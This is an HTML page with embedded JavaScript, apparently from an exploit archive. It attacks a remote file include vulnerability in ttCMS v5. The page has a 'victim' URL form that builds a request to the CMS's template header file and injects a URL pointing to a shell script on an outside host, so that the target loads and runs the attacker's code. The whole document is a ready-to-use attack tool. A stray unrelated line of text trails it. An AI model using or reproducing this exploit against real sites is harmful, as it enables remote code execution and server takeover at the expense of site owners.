<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>coded by ahmadbady</title> <script language="JavaScript"> //=========================================================================== //( #Topic: ttCMS_v5 //( #Bug type : remote file include //( #Advisory : //=========================================================================== //( #Author : ItSecTeam //( #Email: Bug@ITSecTeam.com //( #Website: http://www.itsecteam.com //( #Forum: http://forum.ITSecTeam.com //--------------------------------------------------------------------- var path="/_acp/templates/" var file="inc.header.php" var variable ="?SYSURL[root]=" var shell="http://ahmadbady.persiangig.com/other/a.txt?" function it(){ xpl.action= document.xpl.victim.value+path+file+variable+shell;xpl.submit(); } </script> </head> <body bgcolor="#FFFFFF"> <p align="left"><font color="#0000FF"><b>ttCMS_v5 remote file include</b></font></p> <form method="post" name="xpl" onSubmit="it();"> <p align="left"> <b><font face="Tahoma" size="2"><font color="#FF0000">example</font>:http://victim/scriptpath</a></font> or </font> <font face="Tahoma" size="2" color="#000000">http://victim</font><font size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font size="2" face="Tahoma"> <input type="text" name="victim" size="20";"></p> <center> </p> <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" value="AGAIN" name="B2" style="float: left"></p> </form> <p><br> </p> </center> </body> </html>
体验盒子
